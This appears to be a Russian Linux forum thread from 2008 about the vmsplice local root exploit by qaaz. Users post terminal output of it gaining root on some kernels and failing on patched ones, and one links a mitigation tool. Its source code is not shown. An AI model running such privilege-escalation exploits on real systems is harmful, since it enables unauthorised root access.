Линуксокапец

0

0

Вот так :) Работает у большинства. Я не редиска, но доберутся пионеры до пупкинхостов, ох они огребут радости.

Ссылка

←	Minioutsession at Riga

Патчи на ядро от Red Hat

→

← 1 2 3 4 5 6 7 →

rootkit@rootkit-comp:~/Test$ uname -a Linux rootkit-comp 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux rootkit@rootkit-comp:~/Test$ ./5093 ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] addr: 0xc0113dba [-] wtf rootkit@rootkit-comp:~/Test$ ./5092 ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dff000 .. 0xb7e31000 [+] root root@rootkit-comp:~/Test#

rootkit
(11.02.08 14:59:45 MSK)

Ссылка

Ответ на: комментарий от sS 11.02.08 14:31:22 MSK

Я б не рискнул :-) Локально такие шутки надо таки проверять :-)

Valmont ★★★
(11.02.08 15:13:32 MSK)

Ссылка

под бубунтой работает!

Стандартная бубунта 7.10 32бит дженерик ведро. Работает.

anonymous
(11.02.08 17:03:46 MSK)

Ответ на: под бубунтой работает! от anonymous 11.02.08 17:03:46 MSK

Работет

durman@rasta:/media/sda3/exploit$ ./jessica_biel_naked_in_my_bed ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dc1000 .. 0xb7df3000 [+] root root@rasta:/media/sda3/exploit# whoami root root@rasta:/media/sda3/exploit# uname -a Linux rasta 2.6.22-14-386 #1 Sun Oct 14 22:36:54 GMT 2007 i686 GNU/Linux

durman
(11.02.08 23:19:58 MSK)

Ответ на: Работет от durman 11.02.08 23:19:58 MSK

Ubuntu 7.10

durman
(11.02.08 23:21:35 MSK)

Ответ на: комментарий от durman 11.02.08 23:21:35 MSK

~$ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7db6000 .. 0xb7de8000 Segmentation fault ~$ uname -a Linux 1 2.6.20-16-server #2 SMP Tue Dec 18 05:52:19 UTC 2007 i686 GNU/Linux неработает убунта сервер

anonymous
(11.02.08 23:50:10 MSK)

Ответ на: комментарий от anonymous 11.02.08 23:50:10 MSK

> ... ... ...

вы намеренно без переносов постите?

Adjkru ★★★★★
(12.02.08 00:38:17 MSK)

>Вот так :) Работает у большинства.

Линукскапец отменяется. Представляем доблестным злопыхателям утилиту в стиле "Хацкеры отсосут".

http://slil.ru/25462911

Отключает vmsplice на лету, запускать из-под рута. Можно в init.d добавить скрипт. Проблем пока не выявлено, гружу тачку целый день. Для тех, кому лень пересобирать ядро, самое оно.

Для корректной работы необходимо, чтобы ядро было собрано с поддержкой kmem.

anonymous
(12.02.08 03:25:58 MSK)

Ссылка

Ответ на: комментарий от Adjkru 12.02.08 00:38:17 MSK

нет, прикопипасте вроде все было с переносами

durman
(12.02.08 08:09:39 MSK)

Ссылка

В sid дырку закрыли
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d66000 .. 0xb7d98000
[-] vmsplice: Bad address

Подождем для etch

at ★★
(12.02.08 09:33:00 MSK)

Ответ на: комментарий от at 12.02.08 09:33:00 MSK

Не собирается $ gcc exploite.cpp -o exploite exploite.cpp:9:1: warning: "_GNU_SOURCE" redefined <command line>:1:1: warning: this is the location of the previous definition exploite.cpp: In function ‘void kernel_code()’: exploite.cpp:87: ошибка: некорректное преобразование из ‘void*’ в ‘uint*’

$ gcc -v Используются внутренние спецификации. Целевая архитектура: i686-pc-linux-gnu Параметры конфигурации: /var/tmp/portage/sys-devel/gcc-4.1.2/work/gcc-4.1.2/configure --prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/4.1.2 --includedir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.2/include --datadir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.2 --mandir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.2/man --infodir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.2/info --with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.2/include/g++-v4 --host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --disable-altivec --enable-nls --without-included-gettext --with-system-zlib --disable-checking --disable-werror --enable-secureplt --disable-libunwind-exceptions --disable-multilib --enable-libmudflap --disable-libssp --enable-java-awt=gtk --enable-objc-gc --enable-languages=c,c++,java,objc,obj-c++,fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu Модель многопотоковости: posix gcc версия 4.1.2 (Gentoo 4.1.2)

Specter
(12.02.08 16:58:34 MSK)

Ссылка

на FC сегодня упдейт пришел
[laptop ~]$ uname -a
Linux laptop 2.6.23.15-137.fc8 #1 SMP Sun Feb 10 17:48:34 EST 2008 i686 i686 i386 GNU/Linux
[del@del-laptop ~]$ cc/a.out
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ee3000 .. 0xb7f15000
[-] vmsplice: Bad address

anonymous
(12.02.08 22:14:34 MSK)